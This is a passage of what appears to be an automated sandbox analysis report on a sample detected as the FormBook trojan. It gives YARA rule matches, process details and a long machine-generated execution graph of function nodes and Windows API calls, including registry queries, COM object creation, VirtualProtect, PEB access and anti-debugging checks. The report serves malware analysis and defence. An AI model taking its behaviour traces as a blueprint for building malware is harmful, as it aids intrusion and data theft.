                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4792153711.00000000057C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4792153711.00000000057C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      Target ID:10
                                      Start time:11:36:05
                                      Start date:22/09/2024
                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                      Imagebase:0x7ff704000000
                                      File size:676'768 bytes
                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:3.7%
                                        Dynamic/Decrypted Code Coverage:0.4%
                                        Signature Coverage:9.7%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:37
                                        execution_graph 86127 4010e0 86130 401100 86127->86130 86129 4010f8 86131 401113 86130->86131 86132 401182 86131->86132 86133 401184 86131->86133 86134 40114c 86131->86134 86136 401120 86131->86136 86135 40112c DefWindowProcW 86132->86135 86168 401250 86133->86168 86137 401151 86134->86137 86138 40119d 86134->86138 86135->86129 86136->86135 86189 401000 Shell_NotifyIconW __call_reportfault 86136->86189 86140 401219 86137->86140 86141 40115d 86137->86141 86143 4011a3 86138->86143 86144 42afb4 86138->86144 86140->86136 86147 401225 86140->86147 86145 401163 86141->86145 86146 42b01d 86141->86146 86142 401193 86142->86129 86143->86136 86153 4011b6 KillTimer 86143->86153 86154 4011db SetTimer RegisterWindowMessageW 86143->86154 86184 40f190 10 API calls 86144->86184 86150 42afe9 86145->86150 86151 40116c 86145->86151 86146->86135 86188 4370f4 52 API calls 86146->86188 86200 468b0e 74 API calls __call_reportfault 86147->86200 86186 40f190 10 API calls 86150->86186 86151->86136 86158 401174 86151->86158 86152 42b04f 86190 40e0c0 86152->86190 86183 401000 Shell_NotifyIconW __call_reportfault 86153->86183 86154->86142 86156 401204 CreatePopupMenu 86154->86156 86156->86129 86185 45fd57 65 API calls __call_reportfault 86158->86185 86162 4011c9 PostQuitMessage 86162->86129 86163 42afe4 86163->86142 86164 42b00e 86187 401a50 328 API calls 86164->86187 86167 42afdc 86167->86135 86167->86163 86169 401262 __call_reportfault 86168->86169 86170 4012e8 86168->86170 86201 401b80 86169->86201 86170->86142 86172 40128c 86173 4012d1 KillTimer SetTimer 86172->86173 86174 4012bb 86172->86174 86175 4272ec 86172->86175 86173->86170 86176 4012c5 86174->86176 86177 42733f 86174->86177 86178 4272f4 Shell_NotifyIconW 86175->86178 86179 42731a Shell_NotifyIconW 86175->86179 86176->86173 86180 427393 Shell_NotifyIconW 86176->86180 86181 427348 Shell_NotifyIconW 86177->86181 86182 42736e Shell_NotifyIconW 86177->86182 86178->86173 86179->86173 86180->86173 86181->86173 86182->86173 86183->86162 86184->86142 86185->86167 86186->86164 86187->86132 86188->86132 86189->86152 86191 40e0e7 __call_reportfault 86190->86191 86192 40e142 86191->86192 86194 42729f DestroyIcon 86191->86194 86193 40e184 86192->86193 86299 4341e6 63 API calls __wcsicoll 86192->86299 86196 40e1a0 Shell_NotifyIconW 86193->86196 86197 4272db Shell_NotifyIconW 86193->86197 86194->86192 86198 401b80 54 API calls 86196->86198 86199 40e1ba 86198->86199 86199->86132 86200->86163 86202 401b9c 86201->86202 86222 401c7e 86201->86222 86223 4013c0 86202->86223 86205 42722b LoadStringW 86208 427246 86205->86208 86206 401bb9 86228 402160 86206->86228 86242 40e0a0 86208->86242 86209 401bcd 86211 427258 86209->86211 86212 401bda 86209->86212 86246 40d200 52 API calls 2 library calls 86211->86246 86212->86208 86213 401be4 86212->86213 86241 40d200 52 API calls 2 library calls 86213->86241 86216 427267 86217 42727b 86216->86217 86219 401bf3 _wcscpy __call_reportfault _wcsncpy 86216->86219 86247 40d200 52 API calls 2 library calls 86217->86247 86220 401c62 Shell_NotifyIconW 86219->86220 86220->86222 86221 427289 86222->86172 86248 4115d7 86223->86248 86229 426daa 86228->86229 86230 40216b _wcslen 86228->86230 86286 40c600 86229->86286 86233 402180 86230->86233 86234 40219e 86230->86234 86232 426db5 86232->86209 86285 403bd0 52 API calls ctype 86233->86285 86235 4013a0 52 API calls 86234->86235 86237 4021a5 86235->86237 86239 426db7 86237->86239 86240 4115d7 52 API calls 86237->86240 86238 402187 _memmove 86238->86209 86240->86238 86241->86219 86243 40e0b2 86242->86243 86244 40e0a8 86242->86244 86243->86219 86298 403c30 52 API calls _memmove 86244->86298 86246->86216 86247->86221 86251 4115e1 _malloc 86248->86251 86250 4013e4 86259 4013a0 86250->86259 86251->86250 86255 4115fd std::exception::exception 86251->86255 86262 4135bb 86251->86262 86252 41163b 86277 4180af 46 API calls std::exception::operator= 86252->86277 86254 411645 86278 418105 RaiseException 86254->86278 86255->86252 86276 41130a 51 API calls __cinit 86255->86276 86258 411656 86260 4115d7 52 API calls 86259->86260 86261 4013a7 86260->86261 86261->86205 86261->86206 86263 413638 _malloc 86262->86263 86267 4135c9 _malloc 86262->86267 86284 417f77 46 API calls __getptd_noexit 86263->86284 86266 4135f7 RtlAllocateHeap 86266->86267 86275 413630 86266->86275 86267->86266 86269 413624 86267->86269 86270 4135d4 86267->86270 86273 413622 86267->86273 86282 417f77 46 API calls __getptd_noexit 86269->86282 86270->86267 86279 418901 46 API calls 2 library calls 86270->86279 86280 418752 46 API calls 9 library calls 86270->86280 86281 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86270->86281 86283 417f77 46 API calls __getptd_noexit 86273->86283 86275->86251 86276->86252 86277->86254 86278->86258 86279->86270 86280->86270 86282->86273 86283->86275 86284->86275 86285->86238 86287 40c619 86286->86287 86288 40c60a 86286->86288 86287->86232 86288->86287 86291 4026f0 86288->86291 86290 426d7a _memmove 86290->86232 86292 426873 86291->86292 86293 4026ff 86291->86293 86294 4013a0 52 API calls 86292->86294 86293->86290 86295 42687b 86294->86295 86296 4115d7 52 API calls 86295->86296 86297 42689e _memmove 86296->86297 86297->86290 86298->86243 86299->86193 86300 40bd20 86301 428194 86300->86301 86302 40bd2d 86300->86302 86303 40bd43 86301->86303 86305 4281bc 86301->86305 86307 4281b2 86301->86307 86304 40bd37 86302->86304 86323 4531b1 85 API calls 5 library calls 86302->86323 86312 40bd50 86304->86312 86322 45e987 86 API calls ctype 86305->86322 86321 40b510 VariantClear 86307->86321 86311 4281ba 86313 426cf1 86312->86313 86314 40bd63 86312->86314 86333 44cde9 52 API calls _memmove 86313->86333 86324 40bd80 86314->86324 86317 40bd73 86317->86303 86318 426cfc 86319 40e0a0 52 API calls 86318->86319 86320 426d02 86319->86320 86321->86311 86322->86302 86323->86304 86325 40bd8e 86324->86325 86329 40bdb7 _memmove 86324->86329 86326 40bded 86325->86326 86327 40bdad 86325->86327 86325->86329 86330 4115d7 52 API calls 86326->86330 86334 402f00 86327->86334 86329->86317 86331 40bdf6 86330->86331 86331->86329 86332 4115d7 52 API calls 86331->86332 86332->86329 86333->86318 86335 402f10 86334->86335 86336 402f0c 86334->86336 86337 4115d7 52 API calls 86335->86337 86338 4268c3 86335->86338 86336->86329 86339 402f51 ctype _memmove 86337->86339 86339->86329 86340 3f09430 86354 3f07080 86340->86354 86342 3f094e6 86357 3f09320 86342->86357 86360 3f0a510 GetPEB 86354->86360 86356 3f0770b 86356->86342 86358 3f09329 Sleep 86357->86358 86359 3f09337 86358->86359 86361 3f0a53a 86360->86361 86361->86356 86362 425ba2 86367 40e360 86362->86367 86364 425bb4 86383 41130a 51 API calls __cinit 86364->86383 86366 425bbe 86368 4115d7 52 API calls 86367->86368 86369 40e3ec GetModuleFileNameW 86368->86369 86384 413a0e 86369->86384 86371 40e421 _wcsncat 86387 413a9e 86371->86387 86374 4115d7 52 API calls 86375 40e45e _wcscpy 86374->86375 86390 40bc70 86375->86390 86379 40e4a9 86379->86364 86380 40e4a1 _wcscat _wcslen _wcsncpy 86380->86379 86381 4115d7 52 API calls 86380->86381 86382 401c90 52 API calls 86380->86382 86381->86380 86382->86380 86383->86366 86409 413801 86384->86409 86439 419efd 86387->86439 86391 4115d7 52 API calls 86390->86391 86392 40bc98 86391->86392 86393 4115d7 52 API calls 86392->86393 86394 40bca6 86393->86394 86395 40e4c0 86394->86395 86451 403350 86395->86451 86397 40e4cb RegOpenKeyExW 86398 427190 RegQueryValueExW 86397->86398 86399 40e4eb 86397->86399 86400 4271b0 86398->86400 86401 42721a RegCloseKey 86398->86401 86399->86380 86402 4115d7 52 API calls 86400->86402 86401->86380 86403 4271cb 86402->86403 86458 43652f 52 API calls 86403->86458 86405 4271d8 RegQueryValueExW 86406 42720e 86405->86406 86407 4271f7 86405->86407 86406->86401 86408 402160 52 API calls 86407->86408 86408->86406 86410 41389e 86409->86410 86417 41381a 86409->86417 86411 4139e8 86410->86411 86412 413a00 86410->86412 86436 417f77 46 API calls __getptd_noexit 86411->86436 86438 417f77 46 API calls __getptd_noexit 86412->86438 86414 4139ed 86437 417f25 10 API calls __wcsicoll 86414->86437 86417->86410 86422 41388a 86417->86422 86431 419e30 46 API calls __wcsicoll 86417->86431 86419 41396c 86419->86410 86420 413967 86419->86420 86423 41397a 86419->86423 86420->86371 86421 413929 86421->86410 86424 413945 86421->86424 86433 419e30 46 API calls __wcsicoll 86421->86433 86422->86410 86430 413909 86422->86430 86432 419e30 46 API calls __wcsicoll 86422->86432 86435 419e30 46 API calls __wcsicoll 86423->86435 86424->86410 86424->86420 86427 41395b 86424->86427 86434 419e30 46 API calls __wcsicoll 86427->86434 86430->86419 86430->86421 86431->86422 86432->86430 86433->86424 86434->86420 86435->86420 86436->86414 86437->86420 86438->86420 86440 419f13 86439->86440 86441 419f0e 86439->86441 86448 417f77 46 API calls __getptd_noexit 86440->86448 86441->86440 86447 419f2b 86441->86447 86443 419f18 86449 417f25 10 API calls __wcsicoll 86443->86449 86445 40e454 86445->86374 86447->86445 86450 417f77 46 API calls __getptd_noexit 86447->86450 86448->86443 86449->86445 86450->86443 86452 403367 86451->86452 86453 403358 86451->86453 86454 4115d7 52 API calls 86452->86454 86453->86397 86455 403370 86454->86455 86456 4115d7 52 API calls 86455->86456 86457 40339e 86456->86457 86457->86397 86458->86405 86459 40b374 86460 40b328 86459->86460 86463 40f430 86460->86463 86462 40b333 86464 40f444 86463->86464 86470 40cc70 86464->86470 86466 40f462 86467 40f46b 86466->86467 86479 40c790 VariantClear ctype 86466->86479 86467->86462 86469 40f487 86469->86462 86480 40a780 86470->86480 86472 40cc96 86473 42bd0e 86472->86473 86475 40cc9e 86472->86475 86474 408f40 VariantClear 86473->86474 86476 42bd16 86474->86476 86521 408f40 86475->86521 86476->86466 86478 40ccb8 86478->86466 86479->86469 86481 40a7a6 86480->86481 86482 40ae8c 86480->86482 86484 4115d7 52 API calls 86481->86484 86539 41130a 51 API calls __cinit 86482->86539 86518 40a7c6 ctype _memmove 86484->86518 86485 40a86d 86486 40abd1 86485->86486 86501 40a878 ctype 86485->86501 86550 45e737 90 API calls 3 library calls 86486->86550 86489 408e80 VariantClear 86489->86518 86490 42b791 VariantClear 86490->86518 86491 42ba2d VariantClear 86491->86518 86492 408f40 VariantClear 86492->86501 86493 40a884 ctype 86493->86472 86494 42b459 VariantClear 86494->86518 86495 40e270 VariantClear 86495->86518 86496 42b6f6 VariantClear 86496->86518 86498 40bc10 53 API calls 86498->86518 86500 42bc5b 86500->86472 86501->86492 86501->86493 86502 4115d7 52 API calls 86502->86518 86503 42bbf5 86551 45e737 90 API calls 3 library calls 86503->86551 86504 42bb6a 86553 44b92d VariantClear 86504->86553 86505 4115d7 52 API calls 86509 42b5b3 VariantInit VariantCopy 86505->86509 86506 40b5f0 89 API calls 86506->86518 86508 408f40 VariantClear 86508->86518 86512 42b5d7 VariantClear 86509->86512 86509->86518 86512->86518 86514 42bc37 86552 45e737 90 API calls 3 library calls 86514->86552 86517 42bc48 86517->86504 86519 408f40 VariantClear 86517->86519 86518->86485 86518->86486 86518->86489 86518->86490 86518->86491 86518->86494 86518->86495 86518->86496 86518->86498 86518->86502 86518->86503 86518->86504 86518->86505 86518->86506 86518->86508 86518->86514 86520 4530c9 VariantClear 86518->86520 86525 408cc0 86518->86525 86540 401b10 86518->86540 86546 45308a 53 API calls 86518->86546 86547 470870 52 API calls 86518->86547 86548 457f66 87 API calls __write_nolock 86518->86548 86549 472f47 127 API calls 86518->86549 86519->86504 86520->86518 86522 408f48 ctype 86521->86522 86523 4265c7 VariantClear 86522->86523 86524 408f55 ctype 86522->86524 86523->86524 86524->86478 86554 408d90 86525->86554 86527 429778 86582 410c60 86527->86582 86529 429780 86530 408cf9 86530->86527 86531 42976c 86530->86531 86533 408d2d 86530->86533 86581 45e737 90 API calls 3 library calls 86531->86581 86570 403d10 86533->86570 86536 408d71 ctype 86536->86518 86537 408f40 VariantClear 86538 408d45 ctype 86537->86538 86538->86536 86538->86537 86539->86518 86541 401b16 _wcslen 86540->86541 86542 4115d7 52 API calls 86541->86542 86543 401b63 86541->86543 86544 401b4b _memmove 86542->86544 86543->86518 86545 4115d7 52 API calls 86544->86545 86545->86543 86546->86518 86547->86518 86548->86518 86549->86518 86550->86504 86551->86504 86552->86517 86553->86500 86555 4289d2 86554->86555 86556 408db3 86554->86556 86597 45e737 90 API calls 3 library calls 86555->86597 86587 40bec0 86556->86587 86559 4289e5 86598 45e737 90 API calls 3 library calls 86559->86598 86562 428a05 86563 408f40 VariantClear 86562->86563 86569 408e5a 86563->86569 86564 40a780 197 API calls 86567 408dc9 86564->86567 86565 408e64 86566 408f40 VariantClear 86565->86566 86566->86569 86567->86559 86567->86562 86567->86564 86567->86565 86568 408f40 VariantClear 86567->86568 86567->86569 86591 40ba10 86567->86591 86568->86567 86569->86530 86571 408f40 VariantClear 86570->86571 86572 403d20 86571->86572 86600 403cd0 86572->86600 86574 403d4d 86576 4013c0 52 API calls 86574->86576 86604 4755ad 86574->86604 86607 46f8cb 86574->86607 86626 477145 86574->86626 86631 46adb6 86574->86631 86575 403d76 86575->86527 86575->86538 86576->86575 86581->86527 86583 428372 86582->86583 86584 410c73 ctype 86582->86584 86586 42838c 86583->86586 86837 40e1c0 86583->86837 86584->86529 86588 40bed0 86587->86588 86589 40bef2 86588->86589 86599 45e737 90 API calls 3 library calls 86588->86599 86589->86567 86592 40ba1b ctype _memmove 86591->86592 86594 40ba49 86591->86594 86593 4115d7 52 API calls 86592->86593 86596 40ba22 86593->86596 86595 4115d7 52 API calls 86594->86595 86595->86592 86596->86567 86597->86559 86598->86562 86599->86589 86601 403cdf 86600->86601 86602 408f40 VariantClear 86601->86602 86603 403ce7 86602->86603 86603->86574 86636 475077 86604->86636 86606 4755c0 86606->86575 86608 46f8e7 86607->86608 86609 46f978 86607->86609 86610 46f900 86608->86610 86611 46f8ee 86608->86611 86612 46f93c 86608->86612 86613 46f91a 86608->86613 86609->86575 86616 45340c 85 API calls 86610->86616 86752 45340c 86611->86752 86615 45340c 85 API calls 86612->86615 86614 45340c 85 API calls 86613->86614 86617 46f931 86614->86617 86618 46f958 86615->86618 86616->86611 86620 45340c 85 API calls 86617->86620 86621 45340c 85 API calls 86618->86621 86620->86611 86624 46f95f 86621->86624 86622 46f971 86758 46cb5f 86622->86758 86625 45340c 85 API calls 86624->86625 86625->86611 86627 408e80 VariantClear 86626->86627 86628 47715a 86627->86628 86809 467ac4 86628->86809 86630 477160 86630->86575 86832 4680ed 86631->86832 86633 46adcb 86836 453132 53 API calls __call_reportfault 86633->86836 86635 46ae24 _memmove 86635->86575 86687 4533eb 86636->86687 86639 4750ee 86641 408f40 VariantClear 86639->86641 86640 475129 86691 4646e0 86640->86691 86647 4750f5 86641->86647 86643 47515e 86644 475162 86643->86644 86677 47518e 86643->86677 86646 408f40 VariantClear 86644->86646 86645 475357 86648 475365 86645->86648 86649 4754ea 86645->86649 86660 475169 86646->86660 86647->86606 86725 44b3ac 57 API calls 86648->86725 86735 464812 91 API calls 86649->86735 86653 475374 86704 430d31 86653->86704 86654 4754fc 86654->86653 86656 475508 86654->86656 86655 4533eb 85 API calls 86655->86677 86657 408f40 VariantClear 86656->86657 86659 47550f 86657->86659 86659->86660 86660->86606 86661 475388 86711 4577e9 86661->86711 86664 47539e 86719 410cfc 86664->86719 86665 475480 86667 408f40 VariantClear 86665->86667 86667->86660 86669 4753d4 86727 40e830 53 API calls 86669->86727 86670 4753b8 86726 45e737 90 API calls 3 library calls 86670->86726 86673 4753c5 GetCurrentProcess TerminateProcess 86673->86669 86674 4753e3 86685 475406 86674->86685 86728 40cf00 53 API calls 86674->86728 86675 4754b5 86676 408f40 VariantClear 86675->86676 86676->86660 86677->86645 86677->86655 86677->86665 86677->86675 86723 436299 52 API calls 2 library calls 86677->86723 86724 463ad5 64 API calls __wcsicoll 86677->86724 86679 4753f8 86729 46c43e 106 API calls 2 library calls 86679->86729 86685->86660 86686 408f40 VariantClear 86685->86686 86730 40cf00 53 API calls 86685->86730 86731 408e80 86685->86731 86736 44b3ac 57 API calls 86685->86736 86737 46c43e 106 API calls 2 library calls 86685->86737 86686->86685 86688 453404 86687->86688 86689 4533f8 86687->86689 86688->86639 86688->86640 86689->86688 86738 4531b1 85 API calls 5 library calls 86689->86738 86739 4536f7 53 API calls 86691->86739 86693 4646fc 86740 4426cd 59 API calls _wcslen 86693->86740 86695 464711 86697 40bc70 52 API calls 86695->86697 86703 46474b 86695->86703 86698 46472c 86697->86698 86741 461465 52 API calls _memmove 86698->86741 86700 464741 86701 40c600 52 API calls 86700->86701 86701->86703 86702 464793 86702->86643 86703->86702 86742 463ad5 64 API calls __wcsicoll 86703->86742 86705 430db2 86704->86705 86706 430d54 86704->86706 86705->86661 86707 4115d7 52 API calls 86706->86707 86710 430d74 86707->86710 86708 430da9 86708->86661 86709 4115d7 52 API calls 86709->86710 86710->86708 86710->86709 86712 457a84 86711->86712 86718 45780c _strcat _wcslen _wcscpy ctype 86711->86718 86712->86664 86713 45340c 85 API calls 86713->86718 86714 443006 57 API calls 86714->86718 86716 4135bb 46 API calls _malloc 86716->86718 86718->86712 86718->86713 86718->86714 86718->86716 86743 40f6f0 86718->86743 86751 44b3ac 57 API calls 86718->86751 86721 410d11 86719->86721 86720 410da9 VirtualProtect 86722 410d77 86720->86722 86721->86720 86721->86722 86722->86669 86722->86670 86723->86677 86724->86677 86725->86653 86726->86673 86727->86674 86728->86679 86729->86685 86730->86685 86732 408e88 86731->86732 86734 408e94 86731->86734 86733 408f40 VariantClear 86732->86733 86733->86734 86734->86685 86735->86654 86736->86685 86737->86685 86738->86688 86739->86693 86740->86695 86741->86700 86742->86702 86744 425de2 86743->86744 86747 40f6fc _wcslen 86743->86747 86744->86718 86745 40f710 WideCharToMultiByte 86746 40f756 86745->86746 86748 40f728 86745->86748 86746->86718 86747->86745 86749 4115d7 52 API calls 86748->86749 86750 40f735 WideCharToMultiByte 86749->86750 86750->86718 86751->86718 86753 453439 86752->86753 86754 453419 86752->86754 86753->86622 86755 45342f 86754->86755 86802 4531b1 85 API calls 5 library calls 86754->86802 86755->86622 86757 453425 86757->86622 86759 40bc70 52 API calls 86758->86759 86760 46cb7e 86759->86760 86761 40bc70 52 API calls 86760->86761 86762 46cb86 86761->86762 86763 40bc70 52 API calls 86762->86763 86764 46cb91 86763->86764 86765 408f40 VariantClear 86764->86765 86766 46cbaf 86765->86766 86767 46cbd4 CLSIDFromProgID 86766->86767 86768 46cbc5 OleInitialize 86766->86768 86769 46cc33 86767->86769 86770 46cbe9 CLSIDFromString 86767->86770 86768->86767 86772 46cca6 86769->86772 86773 46cc49 CoCreateInstance 86769->86773 86770->86769 86771 46cbfb 86770->86771 86803 451b42 61 API calls 86771->86803 86804 458651 59 API calls __call_reportfault 86772->86804 86773->86771 86779 46cc62 86773->86779 86776 46ccb3 86776->86771 86777 46ccbc CoInitializeSecurity 86776->86777 86778 46ccdf __call_reportfault 86777->86778 86805 4311fc CoTaskMemAlloc _wcslen _wcscpy 86778->86805 86779->86771 86782 46ceb7 86779->86782 86781 46ccf2 86783 46cd86 _wcslen __call_reportfault 86781->86783 86786 402160 52 API calls 86781->86786 86808 468070 104 API calls ctype 86782->86808 86787 46ce09 CoCreateInstanceEx CoTaskMemFree 86783->86787 86790 46cd21 86783->86790 86785 46cc0b 86785->86609 86789 46cd0c 86786->86789 86787->86771 86788 46ce50 86787->86788 86788->86771 86792 46ce64 CoSetProxyBlanket 86788->86792 86793 46ce8d 86788->86793 86789->86790 86806 465177 52 API calls 86789->86806 86790->86783 86792->86793 86793->86779 86795 46cea4 86793->86795 86794 46cd46 86796 40e0a0 52 API calls 86794->86796 86795->86771 86797 46cd4f 86796->86797 86807 46150f 52 API calls 86797->86807 86798 46cec2 86798->86609 86800 46cd7a 86801 40e0a0 52 API calls 86800->86801 86801->86783 86802->86757 86803->86785 86804->86776 86805->86781 86806->86794 86807->86800 86808->86798 86810 467bb8 86809->86810 86811 467adc 86809->86811 86810->86630 86812 467c1d 86811->86812 86813 467c16 86811->86813 86814 467b90 86811->86814 86815 467aed 86811->86815 86816 4115d7 52 API calls 86812->86816 86831 40e270 VariantClear ctype 86813->86831 86818 4115d7 52 API calls 86814->86818 86819 467b28 ctype 86815->86819 86825 4115d7 52 API calls 86815->86825 86828 467b75 _memmove 86816->86828 86818->86828 86819->86812 86820 467b55 86819->86820 86819->86828 86822 4115d7 52 API calls 86820->86822 86821 4115d7 52 API calls 86821->86810 86823 467b5b 86822->86823 86829 442ee0 52 API calls 86823->86829 86825->86819 86826 467b6b 86830 45f645 54 API calls ctype 86826->86830 86828->86821 86829->86826 86830->86828 86831->86812 86833 468100 86832->86833 86834 4680fa 86832->86834 86833->86633 86835 467ac4 55 API calls 86834->86835 86835->86833 86836->86635 86838 408f40 VariantClear 86837->86838 86839 40e1cb ctype 86838->86839 86839->86583 86840 416454 86877 416c70 86840->86877 86842 416460 GetStartupInfoW 86843 416474 86842->86843 86878 419d5a HeapCreate 86843->86878 86845 4164cd 86846 4164d8 86845->86846 86961 41642b 46 API calls 3 library calls 86845->86961 86879 417c20 GetModuleHandleW 86846->86879 86849 4164de 86850 4164e9 __RTC_Initialize 86849->86850 86962 41642b 46 API calls 3 library calls 86849->86962 86898 41aaa1 GetStartupInfoW 86850->86898 86854 416503 GetCommandLineW 86911 41f584 GetEnvironmentStringsW 86854->86911 86858 416513 86917 41f4d6 GetModuleFileNameW 86858->86917 86860 41651d 86861 416528 86860->86861 86964 411924 46 API calls 3 library calls 86860->86964 86921 41f2a4 86861->86921 86864 41652e 86865 416539 86864->86865 86965 411924 46 API calls 3 library calls 86864->86965 86935 411703 86865->86935 86868 416541 86870 41654c __wwincmdln 86868->86870 86966 411924 46 API calls 3 library calls 86868->86966 86939 40d6b0 86870->86939 86873 41657c 86968 411906 46 API calls _doexit 86873->86968 86876 416581 __commit 86877->86842 86878->86845 86880 417c34 86879->86880 86881 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86879->86881 86969 4178ff 49 API calls _free 86880->86969 86883 417c87 TlsAlloc 86881->86883 86886 417cd5 TlsSetValue 86883->86886 86887 417d96 86883->86887 86885 417c39 86885->86849 86886->86887 86888 417ce6 __init_pointers 86886->86888 86887->86849 86970 418151 InitializeCriticalSectionAndSpinCount 86888->86970 86890 417d91 86978 4178ff 49 API calls _free 86890->86978 86892 417d2a 86892->86890 86971 416b49 86892->86971 86895 417d76 86977 41793c 46 API calls 4 library calls 86895->86977 86897 417d7e GetCurrentThreadId 86897->86887 86899 416b49 __calloc_crt 46 API calls 86898->86899 86900 41aabf 86899->86900 86902 416b49 __calloc_crt 46 API calls 86900->86902 86905 41abb4 86900->86905 86906 4164f7 86900->86906 86907 41ac34 86900->86907 86901 41ac6a GetStdHandle 86901->86907 86902->86900 86903 41acce SetHandleCount 86903->86906 86904 41ac7c GetFileType 86904->86907 86905->86907 86908 41abe0 GetFileType 86905->86908 86909 41abeb InitializeCriticalSectionAndSpinCount 86905->86909 86906->86854 86963 411924 46 API calls 3 library calls 86906->86963 86907->86901 86907->86903 86907->86904 86910 41aca2 InitializeCriticalSectionAndSpinCount 86907->86910 86908->86905 86908->86909 86909->86905 86909->86906 86910->86906 86910->86907 86912 41f595 86911->86912 86913 41f599 86911->86913 86912->86858 86988 416b04 86913->86988 86915 41f5bb _memmove 86916 41f5c2 FreeEnvironmentStringsW 86915->86916 86916->86858 86918 41f50b _wparse_cmdline 86917->86918 86919 416b04 __malloc_crt 46 API calls 86918->86919 86920 41f54e _wparse_cmdline 86918->86920 86919->86920 86920->86860 86922 41f2bc _wcslen 86921->86922 86926 41f2b4 86921->86926 86923 416b49 __calloc_crt 46 API calls 86922->86923 86928 41f2e0 _wcslen 86923->86928 86924 41f336 86995 413748 86924->86995 86926->86864 86927 416b49 __calloc_crt 46 API calls 86927->86928 86928->86924 86928->86926 86928->86927 86929 41f35c 86928->86929 86932 41f373 86928->86932 86994 41ef12 46 API calls __wcsicoll 86928->86994 86930 413748 _free 46 API calls 86929->86930 86930->86926 87001 417ed3 86932->87001 86934 41f37f 86934->86864 86936 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86935->86936 86938 411750 __IsNonwritableInCurrentImage 86936->86938 87020 41130a 51 API calls __cinit 86936->87020 86938->86868 86940 42e2f3 86939->86940 86941 40d6cc 86939->86941 86942 408f40 VariantClear 86941->86942 86943 40d707 86942->86943 87021 40ebb0 86943->87021 86946 40d737 87024 411951 86946->87024 86951 40d751 87036 40f4e0 SystemParametersInfoW SystemParametersInfoW 86951->87036 86953 40d75f 87037 40d590 GetCurrentDirectoryW 86953->87037 86955 40d767 SystemParametersInfoW 86956 40d78d 86955->86956 86957 408f40 VariantClear 86956->86957 86958 40d79d 86957->86958 86959 408f40 VariantClear 86958->86959 86960 40d7a6 86959->86960 86960->86873 86967 4118da 46 API calls _doexit 86960->86967 86961->86846 86962->86850 86967->86873 86968->86876 86969->86885 86970->86892 86973 416b52 86971->86973 86974 416b8f 86973->86974 86975 416b70 Sleep 86973->86975 86979 41f677 86973->86979 86974->86890 86974->86895 86976 416b85 86975->86976 86976->86973 86976->86974 86977->86897 86978->86887 86980 41f683 86979->86980 86986 41f69e _malloc 86979->86986 86981 41f68f 86980->86981 86980->86986 86987 417f77 46 API calls __getptd_noexit 86981->86987 86983 41f6b1 HeapAlloc 86985 41f6d8 86983->86985 86983->86986 86984 41f694 86984->86973 86985->86973 86986->86983 86986->86985 86987->86984 86991 416b0d 86988->86991 86989 4135bb _malloc 45 API calls 86989->86991 86990 416b43 86990->86915 86991->86989 86991->86990 86992 416b24 Sleep 86991->86992 86993 416b39 86992->86993 86993->86990 86993->86991 86994->86928 86996 41377c __dosmaperr 86995->86996 86997 413753 RtlFreeHeap 86995->86997 86996->86926 86997->86996 86998 413768 86997->86998 87004 417f77 46 API calls __getptd_noexit 86998->87004 87000 41376e GetLastError 87000->86996 87005 417daa 87001->87005 87004->87000 87006 417dc9 __call_reportfault 87005->87006 87007 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 87006->87007 87010 417eb5 __call_reportfault 87007->87010 87009 417ed1 GetCurrentProcess TerminateProcess 87009->86934 87011 41a208 87010->87011 87012 41a210 87011->87012 87013 41a212 IsDebuggerPresent 87011->87013 87012->87009 87019 41fe19 87013->87019 87016 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 87017 421ff0 __call_reportfault 87016->87017 87018 421ff8 GetCurrentProcess TerminateProcess 87016->87018 87017->87018 87018->87009 87019->87016 87020->86938 87077 40ebd0 87021->87077 87081 4182cb 87024->87081 87026 41195e 87088 4181f2 LeaveCriticalSection 87026->87088 87028 40d748 87029 4119b0 87028->87029 87030 4119d6 87029->87030 87031 4119bc 87029->87031 87030->86951 87031->87030 87123 417f77 46 API calls __getptd_noexit 87031->87123 87033 4119c6 87124 417f25 10 API calls __wcsicoll 87033->87124 87035 4119d1 87035->86951 87036->86953 87125 401f20 87037->87125 87039 40d5b6 IsDebuggerPresent 87040 40d5c4 87039->87040 87041 42e1bb MessageBoxA 87039->87041 87042 42e1d4 87040->87042 87043 40d5e3 87040->87043 87041->87042 87297 403a50 52 API calls 3 library calls 87042->87297 87195 40f520 87043->87195 87046 40d63b 87050 40d643 87046->87050 87051 42e231 SetCurrentDirectoryW 87046->87051 87048 40d5fd GetFullPathNameW 87207 401460 87048->87207 87052 40d64c 87050->87052 87298 432fee 6 API calls 87050->87298 87051->87050 87222 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 87052->87222 87055 42e252 87055->87052 87058 42e25a GetModuleFileNameW 87055->87058 87060 42e274 87058->87060 87061 42e2cb GetForegroundWindow ShellExecuteW 87058->87061 87059 40d656 87062 40d669 87059->87062 87066 40e0c0 74 API calls 87059->87066 87064 401b10 52 API calls 87060->87064 87063 40d688 87061->87063 87230 4091e0 87062->87230 87070 40d692 SetCurrentDirectoryW 87063->87070 87065 42e281 87064->87065 87299 40d200 52 API calls 2 library calls 87065->87299 87066->87062 87070->86955 87071 42e28d 87300 40d200 52 API calls 2 library calls 87071->87300 87074 42e299 GetForegroundWindow ShellExecuteW 87075 42e2c6 87074->87075 87075->87063 87076 40ec00 LoadLibraryA GetProcAddress 87076->86946 87078 40d72e 87077->87078 87079 40ebd6 LoadLibraryA 87077->87079 87078->86946 87078->87076 87079->87078 87080 40ebe7 GetProcAddress 87079->87080 87080->87078 87082 4182e0 87081->87082 87083 